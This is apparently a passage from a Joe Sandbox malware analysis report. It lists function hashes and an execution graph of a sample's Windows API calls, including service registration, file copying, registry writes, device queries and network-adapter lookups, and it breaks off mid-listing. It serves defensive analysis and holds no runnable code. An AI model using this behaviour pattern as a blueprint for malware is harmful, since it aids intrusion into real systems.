                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                              • String ID: Detected restart. Removing temporary directory.
                                                              • API String ID: 1717587489-3199836293
                                                              • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                              • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                              • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                              • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                              Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                              • GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CommandHandleLineModule
                                                              • String ID: `6h
                                                              • API String ID: 2123368496-2112055853
                                                              • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                              • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                              • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                              • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                              Function 00455674 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastSleep
                                                              • String ID:
                                                              • API String ID: 1458359878-0
                                                              • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                              • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                              • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                              • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                              Execution Graph

                                                              Execution Coverage:4.1%
                                                              Dynamic/Decrypted Code Coverage:83.5%
                                                              Signature Coverage:3.5%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:37
                                                              execution_graph 18281 40b902 RegCreateKeyExA 18282 2e1e864 18283 2e1e9e2 WriteFile 18282->18283 18284 40b846 lstrcmpiW 18285 40b176 StartServiceCtrlDispatcherA 18284->18285 18287 40b854 18284->18287 18288 40b1ee 18285->18288 18289 2dc79da 18290 2def353 ReadFile 18289->18290 18291 2df5a64 18290->18291 18292 40264c 18293 40b28f VirtualAlloc 18292->18293 18295 40b44f Sleep 18296 402151 18297 402156 18296->18297 18298 40b7e9 CopyFileA 18297->18298 18299 40b413 18302 401f64 FindResourceA 18299->18302 18301 40b418 18301->18301 18303 401f86 GetLastError SizeofResource 18302->18303 18309 401f9f 18302->18309 18304 401fa6 LoadResource LockResource GlobalAlloc 18303->18304 18303->18309 18305 401fd2 18304->18305 18306 401ffb GetTickCount 18305->18306 18308 402005 GlobalAlloc 18306->18308 18308->18309 18309->18301 18310 2d8104d 18315 2d932d4 18310->18315 18321 2d931d8 18315->18321 18317 2d81057 18318 2d81aa9 InterlockedIncrement 18317->18318 18319 2d8105c 18318->18319 18320 2d81ac5 WSAStartup InterlockedExchange 18318->18320 18320->18319 18322 2d931e4 __commit 18321->18322 18329 2d984c2 18322->18329 18328 2d9320b __commit 18328->18317 18346 2d9881d 18329->18346 18331 2d931ed 18332 2d9321c RtlDecodePointer RtlDecodePointer 18331->18332 18333 2d93249 18332->18333 18334 2d931f9 18332->18334 18333->18334 18645 2d9908d 18333->18645 18343 2d93216 18334->18343 18336 2d932ac RtlEncodePointer RtlEncodePointer 18336->18334 18337 2d9325b 18337->18336 18338 2d93280 18337->18338 18652 2d98a2b 18337->18652 18338->18334 18340 2d98a2b __realloc_crt 62 API calls 18338->18340 18342 2d9329a RtlEncodePointer 18338->18342 18341 2d93294 18340->18341 18341->18334 18341->18342 18342->18336 18679 2d984cb 18343->18679 18347 2d9882e 18346->18347 18348 2d98841 RtlEnterCriticalSection 18346->18348 18353 2d988a5 18347->18353 18348->18331 18350 2d98834 18350->18348 18375 2d9836f 18350->18375 18354 2d988b1 __commit 18353->18354 18355 2d988d0 18354->18355 18382 2d98603 18354->18382 18363 2d988f3 __commit 18355->18363 18429 2d989e4 18355->18429 18361 2d988fd 18367 2d9881d __lock 59 API calls 18361->18367 18362 2d988ee 18434 2d95d8b 18362->18434 18363->18350 18364 2d988c6 18426 2d9824c 18364->18426 18368 2d98904 18367->18368 18369 2d98929 18368->18369 18370 2d98911 18368->18370 18440 2d92ea4 18369->18440 18437 2d9913c 18370->18437 18373 2d9891d 18446 2d98945 18373->18446 18376 2d98603 __FF_MSGBANNER 59 API calls 18375->18376 18377 2d98377 18376->18377 18378 2d98660 __NMSG_WRITE 59 API calls 18377->18378 18379 2d9837f 18378->18379 18615 2d9841e 18379->18615 18449 2da00be 18382->18449 18384 2d9860a 18386 2da00be __NMSG_WRITE 59 API calls 18384->18386 18388 2d98617 18384->18388 18385 2d98660 __NMSG_WRITE 59 API calls 18387 2d9862f 18385->18387 18386->18388 18390 2d98660 __NMSG_WRITE 59 API calls 18387->18390 18388->18385 18389 2d98639 18388->18389 18391 2d98660 18389->18391 18390->18389 18392 2d9867e __NMSG_WRITE 18391->18392 18394 2da00be __NMSG_WRITE 55 API calls 18392->18394 18425 2d987a5 18392->18425 18396 2d98691 18394->18396 18395 2d9880e 18395->18364 18397 2d987aa GetStdHandle 18396->18397 18398 2da00be __NMSG_WRITE 55 API calls 18396->18398 18401 2d987b8 _strlen 18397->18401 18397->18425 18399 2d986a2 18398->18399 18399->18397 18400 2d986b4 18399->18400 18400->18425 18471 2d9f46d 18400->18471 18403 2d987f1 WriteFile 18401->18403 18401->18425 18403->18425 18405 2d986e1 GetModuleFileNameW 18407 2d98701 18405->18407 18412 2d98711 __NMSG_WRITE 18405->18412 18406 2d98812 18408 2d94e35 __invoke_watson 8 API calls 18406->18408 18409 2d9f46d __NMSG_WRITE 55 API calls 18407->18409 18410 2d9881c 18408->18410 18409->18412 18411 2d98841 RtlEnterCriticalSection 18410->18411 18415 2d988a5 __mtinitlocknum 55 API calls 18410->18415 18411->18364 18412->18406 18413 2d98757 18412->18413 18480 2d9f4e2 18412->18480 18413->18406 18489 2d9f401 18413->18489 18417 2d98834 18415->18417 18417->18411 18419 2d9836f __amsg_exit 55 API calls 18417->18419 18421 2d98840 18419->18421 18420 2d9f401 __NMSG_WRITE 55 API calls 18422 2d9878e 18420->18422 18421->18411 18422->18406 18423 2d98795 18422->18423 18498 2da00fe RtlEncodePointer 18423->18498 18523 2d9447b 18425->18523 18538 2d98218 GetModuleHandleExW 18426->18538 18431 2d989f2 18429->18431 18432 2d988e7 18431->18432 18541 2d92edc 18431->18541 18558 2d99435 Sleep 18431->18558 18432->18361 18432->18362 18561 2d95ba2 GetLastError 18434->18561 18436 2d95d90 18436->18363 18438 2d99159 InitializeCriticalSectionAndSpinCount 18437->18438 18439 2d9914c 18437->18439 18438->18373 18439->18373 18441 2d92ed6 _free 18440->18441 18442 2d92ead HeapFree 18440->18442 18441->18373 18442->18441 18443 2d92ec2 18442->18443 18444 2d95d8b __mbsnbcmp_l 57 API calls 18443->18444 18445 2d92ec8 GetLastError 18444->18445 18445->18441 18614 2d98987 RtlLeaveCriticalSection 18446->18614 18448 2d9894c 18448->18363 18450 2da00c8 18449->18450 18451 2da00d2 18450->18451 18452 2d95d8b __mbsnbcmp_l 59 API calls 18450->18452 18451->18384 18453 2da00ee 18452->18453 18456 2d94e25 18453->18456 18459 2d94dfa RtlDecodePointer 18456->18459 18460 2d94e0d 18459->18460 18465 2d94e35 IsProcessorFeaturePresent 18460->18465 18463 2d94dfa __mbsnbcmp_l 8 API calls 18464 2d94e31 18463->18464 18464->18384 18466 2d94e40 18465->18466 18467 2d94cc8 __call_reportfault 7 API calls 18466->18467 18468 2d94e55 18467->18468 18469 2d99443 ___raise_securityfailure GetCurrentProcess TerminateProcess 18468->18469 18470 2d94e24 18469->18470 18470->18463 18472 2d9f478 18471->18472 18473 2d9f486 18471->18473 18472->18473 18478 2d9f49f 18472->18478 18474 2d95d8b __mbsnbcmp_l 59 API calls 18473->18474 18475 2d9f490 18474->18475 18476 2d94e25 __mbsnbcmp_l 9 API calls 18475->18476 18477 2d986d4 18476->18477 18477->18405 18477->18406 18478->18477 18479 2d95d8b __mbsnbcmp_l 59 API calls 18478->18479 18479->18475 18485 2d9f4f0 18480->18485 18481 2d9f4f4 18482 2d95d8b __mbsnbcmp_l 59 API calls 18481->18482 18483 2d9f4f9 18481->18483 18484 2d9f524 18482->18484 18483->18413 18486 2d94e25 __mbsnbcmp_l 9 API calls 18484->18486 18485->18481 18485->18483 18487 2d9f533 18485->18487 18486->18483 18487->18483 18488 2d95d8b __mbsnbcmp_l 59 API calls 18487->18488 18488->18484 18490 2d9f41b 18489->18490 18493 2d9f40d 18489->18493 18491 2d95d8b __mbsnbcmp_l 59 API calls 18490->18491 18492 2d9f425 18491->18492 18494 2d94e25 __mbsnbcmp_l 9 API calls 18492->18494 18493->18490 18496 2d9f447 18493->18496 18495 2d98777 18494->18495 18495->18406 18495->18420 18496->18495 18497 2d95d8b __mbsnbcmp_l 59 API calls 18496->18497 18497->18492 18499 2da0132 ___crtIsPackagedApp 18498->18499 18500 2da01f1 IsDebuggerPresent 18499->18500 18501 2da0141 LoadLibraryExW 18499->18501 18504 2da01fb 18500->18504 18505 2da0216 18500->18505 18502 2da0158 GetLastError 18501->18502 18503 2da017e GetProcAddress 18501->18503 18506 2da0167 LoadLibraryExW 18502->18506 18512 2da020e 18502->18512 18507 2da0192 7 API calls 18503->18507 18503->18512 18508 2da0202 OutputDebugStringW 18504->18508 18513 2da0209 18504->18513 18509 2da021b RtlDecodePointer 18505->18509 18505->18513 18506->18503 18506->18512 18510 2da01da GetProcAddress RtlEncodePointer 18507->18510 18511 2da01ee 18507->18511 18508->18513 18509->18512 18510->18511 18511->18500 18515 2d9447b __write_nolock 6 API calls 18512->18515 18513->18512 18514 2da0242 RtlDecodePointer RtlDecodePointer 18513->18514 18521 2da025a 18513->18521 18514->18521 18519 2da02e0 18515->18519 18516 2da0292 RtlDecodePointer 18517 2da027e RtlDecodePointer 18516->18517 18520 2da0299 18516->18520 18517->18512 18519->18425 18520->18517 18522 2da02aa RtlDecodePointer 18520->18522 18521->18516 18521->18517 18522->18517 18524 2d94483 18523->18524 18525 2d94485 IsProcessorFeaturePresent 18523->18525 18524->18395 18527 2d994bf 18525->18527 18530 2d9946e IsDebuggerPresent 18527->18530 18531 2d99483 __call_reportfault 18530->18531 18536 2d99458 SetUnhandledExceptionFilter UnhandledExceptionFilter 18531->18536 18533 2d9948b __call_reportfault 18537 2d99443 GetCurrentProcess TerminateProcess 18533->18537 18535 2d994a8 18535->18395 18536->18533 18537->18535 18539 2d98243 ExitProcess 18538->18539 18540 2d98231 GetProcAddress 18538->18540 18540->18539 18542 2d92f57 18541->18542 18550 2d92ee8 18541->18550 18543 2d98133 _malloc RtlDecodePointer 18542->18543 18544 2d92f5d 18543->18544 18546 2d95d8b __mbsnbcmp_l 58 API calls 18544->18546 18545 2d98603 __FF_MSGBANNER 58 API calls 18555 2d92ef3 18545->18555 18557 2d92f4f 18546->18557 18547 2d92f1b RtlAllocateHeap 18547->18550 18547->18557 18548 2d98660 __NMSG_WRITE 58 API calls 18548->18555 18549 2d92f43 18552 2d95d8b __mbsnbcmp_l 58 API calls 18549->18552 18550->18547 18550->18549 18554 2d92f41 18550->18554 18550->18555 18559 2d98133 RtlDecodePointer 18550->18559 18552->18554 18553 2d9824c __mtinitlocknum 3 API calls 18553->18555 18556 2d95d8b __mbsnbcmp_l 58 API calls 18554->18556 18555->18545 18555->18548 18555->18550 18555->18553 18556->18557 18557->18431 18558->18431 18560 2d98146 18559->18560 18560->18550 18575 2d990fb 18561->18575 18563 2d95bb7 18564 2d95c05 SetLastError 18563->18564 18578 2d9899c 18563->18578 18564->18436 18568 2d95bde 18569 2d95bfc 18568->18569 18570 2d95be4 18568->18570 18572 2d92ea4 _free 56 API calls 18569->18572 18587 2d95c11 18570->18587 18574 2d95c02 18572->18574 18573 2d95bec GetCurrentThreadId 18573->18564 18574->18564 18576 2d9910e 18575->18576 18577 2d99112 TlsGetValue 18575->18577 18576->18563 18577->18563 18580 2d989a3 18578->18580 18581 2d95bca 18580->18581 18583 2d989c1 18580->18583 18597 2da03f8 18580->18597 18581->18564 18584 2d9911a 18581->18584 18583->18580 18583->18581 18605 2d99435 Sleep 18583->18605 18585 2d99130 18584->18585 18586 2d99134 TlsSetValue 18584->18586 18585->18568 18586->18568 18588 2d95c1d __commit 18587->18588 18589 2d9881d __lock 59 API calls 18588->18589 18590 2d95c5a 18589->18590 18606 2d95cb2 18590->18606 18593 2d9881d __lock 59 API calls 18594 2d95c7b ___addlocaleref 18593->18594 18609 2d95cbb 18594->18609 18596 2d95ca6 __commit 18596->18573 18598 2da0403 18597->18598 18603 2da041e 18597->18603 18599 2da040f 18598->18599 18598->18603 18600 2d95d8b __mbsnbcmp_l 58 API calls 18599->18600 18602 2da0414 18600->18602 18601 2da042e RtlAllocateHeap 18601->18602 18601->18603 18602->18580 18603->18601 18603->18602 18604 2d98133 _malloc RtlDecodePointer 18603->18604 18604->18603 18605->18583 18612 2d98987 RtlLeaveCriticalSection 18606->18612 18608 2d95c74 18608->18593 18613 2d98987 RtlLeaveCriticalSection 18609->18613 18611 2d95cc2 18611->18596 18612->18608 18613->18611 18614->18448 18618 2d984d4 18615->18618 18617 2d9838a 18619 2d984e0 __commit 18618->18619 18620 2d9881d __lock 52 API calls 18619->18620 18621 2d984e7 18620->18621 18622 2d985a0 __cinit 18621->18622 18623 2d98515 RtlDecodePointer 18621->18623 18638 2d985ee 18622->18638 18623->18622 18625 2d9852c RtlDecodePointer 18623->18625 18631 2d9853c 18625->18631 18627 2d985fd __commit 18627->18617 18629 2d98549 RtlEncodePointer 18629->18631 18630 2d985e5 18632 2d9824c __mtinitlocknum 3 API calls 18630->18632 18631->18622 18631->18629 18633 2d98559 RtlDecodePointer RtlEncodePointer 18631->18633 18634 2d985ee 18632->18634 18636 2d9856b RtlDecodePointer RtlDecodePointer 18633->18636 18635 2d985fb 18634->18635 18643 2d98987 RtlLeaveCriticalSection 18634->18643 18635->18617 18636->18631 18639 2d985ce 18638->18639 18640 2d985f4 18638->18640 18639->18627 18642 2d98987 RtlLeaveCriticalSection 18639->18642 18644 2d98987 RtlLeaveCriticalSection 18640->18644 18642->18630 18643->18635 18644->18639 18646 2d990ab RtlSizeHeap 18645->18646 18647 2d99096 18645->18647 18646->18337 18648 2d95d8b __mbsnbcmp_l 59 API calls 18647->18648 18649 2d9909b 18648->18649 18650 2d94e25 __mbsnbcmp_l 9 API calls 18649->18650 18651 2d990a6 18650->18651 18651->18337 18655 2d98a32 18652->18655 18654 2d98a6f 18654->18338 18655->18654 18657 2da02e4 18655->18657 18678 2d99435 Sleep 18655->18678 18658 2da02f8 18657->18658 18659 2da02ed 18657->18659 18660 2da0300 18658->18660 18670 2da030d 18658->18670 18661 2d92edc _malloc 59 API calls 18659->18661 18663 2d92ea4 _free 59 API calls 18660->18663 18662 2da02f5 18661->18662 18662->18655 18677 2da0308 _free 18663->18677 18664 2da0345 18666 2d98133 _malloc RtlDecodePointer 18664->18666 18665 2da0315 RtlReAllocateHeap 18665->18670 18665->18677 18667 2da034b 18666->18667 18668 2d95d8b __mbsnbcmp_l 59 API calls 18667->18668 18668->18677 18669 2da0375 18672 2d95d8b __mbsnbcmp_l 59 API calls 18669->18672 18670->18664 18670->18665 18670->18669 18671 2d98133 _malloc RtlDecodePointer 18670->18671 18674 2da035d 18670->18674 18671->18670 18673 2da037a GetLastError 18672->18673 18673->18677 18675 2d95d8b __mbsnbcmp_l 59 API calls 18674->18675 18676 2da0362 GetLastError 18675->18676 18676->18677 18677->18655 18678->18655 18682 2d98987 RtlLeaveCriticalSection 18679->18682 18681 2d9321b 18681->18328 18682->18681 18683 2dbfacc 18684 2dbfa59 18683->18684 18685 2dbfad0 18683->18685 18686 2dbfa8c CreateFileA 18684->18686 18686->18683 18687 2dbeb47 18688 2dbeb4c CreateFileA 18687->18688 18689 2dbeb59 18688->18689 18690 2dbf346 18693 2d8f7d5 CreateFileA 18690->18693 18694 2d8f8d1 18693->18694 18697 2d8f806 18693->18697 18695 2d8f81e DeviceIoControl 18695->18697 18696 2d8f8c7 CloseHandle 18696->18694 18697->18695 18697->18696 18698 2d8f893 GetLastError 18697->18698 18700 2d93a7c 18697->18700 18698->18696 18698->18697 18703 2d93a84 18700->18703 18701 2d92edc _malloc 59 API calls 18701->18703 18702 2d93a9e 18702->18697 18703->18701 18703->18702 18704 2d98133 _malloc RtlDecodePointer 18703->18704 18705 2d93aa2 std::exception::exception 18703->18705 18704->18703 18708 2d9448a 18705->18708 18707 2d93acc 18709 2d944a9 RaiseException 18708->18709 18709->18707 18711 40275d 18712 40ba95 Sleep 18711->18712 18713 2d86487 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 18791 2d842c7 18713->18791 18792 402d60 GetVersion 18816 4039f0 HeapCreate 18792->18816 18794 402dbf 18795 402dc4 18794->18795 18796 402dcc 18794->18796 18891 402e7b 18795->18891 18828 4036d0 18796->18828 18800 402dd4 GetCommandLineA 18842 40359e 18800->18842 18804 402dee 18874 403298 18804->18874 18806 402df3 18807 402df8 GetStartupInfoA 18806->18807 18887 403240 18807->18887 18809 402e0a GetModuleHandleA 18811 402e2e 18809->18811 18897 402fe7 18811->18897 18817 403a10 18816->18817 18818 403a46 18816->18818 18904 4038a8 18817->18904 18818->18794 18821 403a1f 18916 403dc7 HeapAlloc 18821->18916 18823 403a2c 18824 403a49 18823->18824 18918 404618 18823->18918 18824->18794 18825 403a29 18825->18824 18827 403a3a HeapDestroy 18825->18827 18827->18818 18981 402e9f 18828->18981 18831 4036ef GetStartupInfoA 18839 40373b 18831->18839 18840 403800 18831->18840 18834 403867 SetHandleCount 18834->18800 18835 403827 GetStdHandle 18838 403835 GetFileType 18835->18838 18835->18840 18836 4037ac 18836->18840 18841 4037ce GetFileType 18836->18841 18837 402e9f 12 API calls 18837->18839 18838->18840 18839->18836 18839->18837 18839->18840 18840->18834 18840->18835 18841->18836 18843 4035b9 GetEnvironmentStringsW 18842->18843 18844 4035ec 18842->18844 18845 4035c1 18843->18845 18847 4035cd GetEnvironmentStrings 18843->18847 18844->18845 18846 4035dd 18844->18846 18849 403605 WideCharToMultiByte 18845->18849 18850 4035f9 GetEnvironmentStringsW 18845->18850 18848 402de4 18846->18848 18851 40368b 18846->18851 18852 40367f GetEnvironmentStrings 18846->18852 18847->18846 18847->18848 18865 403351 18848->18865 18854 403639 18849->18854 18855 40366b FreeEnvironmentStringsW 18849->18855 18850->18848 18850->18849 18856 402e9f 12 API calls 18851->18856 18852->18848 18852->18851 18857 402e9f 12 API calls 18854->18857 18855->18848 18863 4036a6 18856->18863 18858 40363f 18857->18858 18858->18855 18859 403648 WideCharToMultiByte 18858->18859 18861 403662 18859->18861 18862 403659 18859->18862 18860 4036bc FreeEnvironmentStringsA 18860->18848 18861->18855 19047 402f51 18862->19047 18863->18860 18866 403363 18865->18866 18867 403368 GetModuleFileNameA 18865->18867 19077 405042 18866->19077 18869 40338b 18867->18869 18870 402e9f 12 API calls 18869->18870 18871 4033ac 18870->18871 18872 402e56 7 API calls 18871->18872 18873 4033bc 18871->18873 18872->18873 18873->18804 18875 4032a5 18874->18875 18878 4032aa 18874->18878 18876 405042 19 API calls 18875->18876 18876->18878 18877 402e9f 12 API calls 18879 4032d7 18877->18879 18878->18877 18880 402e56 7 API calls 18879->18880 18886 4032eb 18879->18886 18880->18886 18881 40332e 18882 402f51 7 API calls 18881->18882 18883 40333a 18882->18883 18883->18806 18884 402e9f 12 API calls 18884->18886 18885 402e56 7 API calls 18885->18886 18886->18881 18886->18884 18886->18885 18888 403249 18887->18888 18890 40324e 18887->18890 18889 405042 19 API calls 18888->18889 18889->18890 18890->18809 18892 402e84 18891->18892 18893 402e89 18891->18893 18894 403c20 7 API calls 18892->18894 18895 403c59 7 API calls 18893->18895 18894->18893 18896 402e92 ExitProcess 18895->18896 19101 403009 18897->19101 18900 4030bc 18901 4030c8 18900->18901 18902 4031f1 UnhandledExceptionFilter 18901->18902 18903 402e48 18901->18903 18902->18903 18927 402c40 18904->18927 18907 4038d1 18908 4038eb GetEnvironmentVariableA 18907->18908 18910 4038e3 18907->18910 18909 4039c8 18908->18909 18912 40390a 18908->18912 18909->18910 18932 40387b GetModuleHandleA 18909->18932 18910->18821 18910->18823 18913 40394f GetModuleFileNameA 18912->18913 18914 403947 18912->18914 18913->18914 18914->18909 18929 40505e 18914->18929 18917 403de3 18916->18917 18917->18825 18919 404625 18918->18919 18920 40462c HeapAlloc 18918->18920 18921 404649 VirtualAlloc 18919->18921 18920->18921 18926 404681 18920->18926 18922 404669 VirtualAlloc 18921->18922 18923 40473e 18921->18923 18924 404730 VirtualFree 18922->18924 18922->18926 18925 404746 HeapFree 18923->18925 18923->18926 18924->18923 18925->18926 18926->18825 18928 402c4c GetVersionExA 18927->18928 18928->18907 18928->18908 18934 405075 18929->18934 18933 403892 18932->18933 18933->18910 18936 40508d 18934->18936 18938 4050bd 18936->18938 18941 405d39 18936->18941 18937 405d39 6 API calls 18937->18938 18938->18937 18940 405071 18938->18940 18945 405c6d 18938->18945 18940->18909 18942 405d57 18941->18942 18943 405d4b 18941->18943 18951 405b24 18942->18951 18943->18936 18946 405c98 18945->18946 18950 405c7b 18945->18950 18947 405cb4 18946->18947 18948 405d39 6 API calls 18946->18948 18947->18950 18963 4058d5 18947->18963 18948->18947 18950->18938 18952 405b55 GetStringTypeW 18951->18952 18954 405b6d 18951->18954 18953 405b71 GetStringTypeA 18952->18953 18952->18954 18953->18954 18955 405c59 18953->18955 18957 405b98 GetStringTypeA 18954->18957 18958 405bbc 18954->18958 18955->18943 18957->18955 18958->18955 18959 405bd2 MultiByteToWideChar 18958->18959 18959->18955 18960 405bf6 18959->18960 18960->18955 18961 405c30 MultiByteToWideChar 18960->18961 18961->18955 18962 405c49 GetStringTypeW 18961->18962 18962->18955 18964 405905 LCMapStringW 18963->18964 18965 405921 18963->18965 18964->18965 18966 405929 LCMapStringA 18964->18966 18968 405987 18965->18968 18969 40596a LCMapStringA 18965->18969 18966->18965 18967 405a63 18966->18967 18967->18950 18968->18967 18970 40599d MultiByteToWideChar 18968->18970 18969->18967 18970->18967 18971 4059c7 18970->18971 18971->18967 18972 4059fd MultiByteToWideChar 18971->18972 18972->18967 18973 405a16 LCMapStringW 18972->18973 18973->18967 18974 405a31 18973->18974 18975 405a37 18974->18975 18977 405a77 18974->18977 18975->18967 18976 405a45 LCMapStringW 18975->18976 18976->18967 18977->18967 18978 405aaf LCMapStringW 18977->18978 18978->18967 18979 405ac7 WideCharToMultiByte 18978->18979 18979->18967 18990 402eb1 18981->18990 18984 402e56 18985 402e64 18984->18985 18986 402e5f 18984->18986 19033 403c59 18985->19033 19027 403c20 18986->19027 18991 402eae 18990->18991 18993 402eb8 18990->18993 18991->18831 18991->18984 18993->18991 18994 402edd 18993->18994 18995 402eec 18994->18995 18997 402f01 18994->18997 19002 402efa 18995->19002 19003 404163 18995->19003 18998 402f40 HeapAlloc 18997->18998 18997->19002 19009 404910 18997->19009 19000 402f4f 18998->19000 18999 402eff 18999->18993 19000->18993 19002->18998 19002->18999 19002->19000 19006 404195 19003->19006 19004 404234 19008 404243 19004->19008 19023 40451d 19004->19023 19006->19004 19006->19008 19016 40446c 19006->19016 19008->19002 19014 40491e 19009->19014 19010 404a0a VirtualAlloc 19015 4049db 19010->19015 19011 404adf 19012 404618 5 API calls 19011->19012 19012->19015 19014->19010 19014->19011 19014->19015 19015->19002 19015->19015 19017 4044af HeapAlloc 19016->19017 19018 40447f HeapReAlloc 19016->19018 19020 4044ff 19017->19020 19021 4044d5 VirtualAlloc 19017->19021 19019 40449e 19018->19019 19018->19020 19019->19017 19020->19004 19021->19020 19022 4044ef HeapFree 19021->19022 19022->19020 19024 40452f VirtualAlloc 19023->19024 19026 404578 19024->19026 19026->19008 19028 403c2a 19027->19028 19029 403c57 19028->19029 19030 403c59 7 API calls 19028->19030 19029->18985 19031 403c41 19030->19031 19032 403c59 7 API calls 19031->19032 19032->19029 19035 403c6c 19033->19035 19034 403d83 19037 403d96 GetStdHandle WriteFile 19034->19037 19035->19034 19036 403cac 19035->19036 19041 402e6d 19035->19041 19038 403cb8 GetModuleFileNameA 19036->19038 19036->19041 19037->19041 19039 403cd0 19038->19039 19042 405408 19039->19042 19041->18831 19043 405415 LoadLibraryA 19042->19043 19045 405457 19042->19045 19044 405426 GetProcAddress 19043->19044 19043->19045 19044->19045 19046 40543d GetProcAddress GetProcAddress 19044->19046 19045->19041 19046->19045 19048 402f5d 19047->19048 19056 402f79 19047->19056 19050 402f67 19048->19050 19051 402f7d 19048->19051 19049 402fa8 19052 402fa9 HeapFree 19049->19052 19050->19052 19053 402f73 19050->19053 19051->19049 19055 402f97 19051->19055 19052->19056 19058 403e3a 19053->19058 19064 4048cb 19055->19064 19056->18861 19059 403e78 19058->19059 19063 40412e 19058->19063 19060 404074 VirtualFree 19059->19060 19059->19063 19061 4040d8 19060->19061 19062 4040e7 VirtualFree HeapFree 19061->19062 19061->19063 19062->19063 19063->19056 19065 4048f8 19064->19065 19066 40490e 19064->19066 19065->19066 19068 4047b2 19065->19068 19066->19056 19071 4047bf 19068->19071 19069 40486f 19069->19066 19070 4047e0 VirtualFree 19070->19071 19071->19069 19071->19070 19073 40475c VirtualFree 19071->19073 19074 404779 19073->19074 19075 4047a9 19074->19075 19076 404789 HeapFree 19074->19076 19075->19071 19076->19071 19078 40504b 19077->19078 19079 405052 19077->19079 19081 404c7e 19078->19081 19079->18867 19088 404e17 19081->19088 19083 404e0b 19083->19079 19086 404cc1 GetCPInfo 19087 404cd5 19086->19087 19087->19083 19093 404ebd GetCPInfo 19087->19093 19089 404e37 19088->19089 19090 404e27 GetOEMCP 19088->19090 19091 404c8f 19089->19091 19092 404e3c GetACP 19089->19092 19090->19089 19091->19083 19091->19086 19091->19087 19092->19091 19094 404fa8 19093->19094 19097 404ee0 19093->19097 19094->19083 19095 405b24 6 API calls 19096 404f5c 19095->19096 19098 4058d5 9 API calls 19096->19098 19097->19095 19099 404f80 19098->19099 19100 4058d5 9 API calls 19099->19100 19100->19094 19102 403015 GetCurrentProcess TerminateProcess 19101->19102 19103 403026 19101->19103 19102->19103 19104 402e37 19103->19104 19105 403090 ExitProcess 19103->19105 19104->18900 19107 401f27 19108 401f3c 19107->19108 19111 401a1d 19108->19111 19110 401f45 19112 401a2c 19111->19112 19117 401a4f CreateFileA 19112->19117 19116 401a3e 19116->19110 19118 401a35 19117->19118 19120 401a7d 19117->19120 19125 401b4b LoadLibraryA 19118->19125 19119 401a98 DeviceIoControl 19119->19120 19120->19119 19122 401b3a CloseHandle 19120->19122 19123 401b0e GetLastError 19120->19123 19134 402ba6 19120->19134 19137 402b98 19120->19137 19122->19118 19123->19120 19123->19122 19126 401c21 19125->19126 19127 401b6e GetProcAddress 19125->19127 19126->19116 19128 401c18 FreeLibrary 19127->19128 19130 401b85 19127->19130 19128->19126 19129 401b95 GetAdaptersInfo 19129->19130 19130->19129 19131 401c15 19130->19131 19132 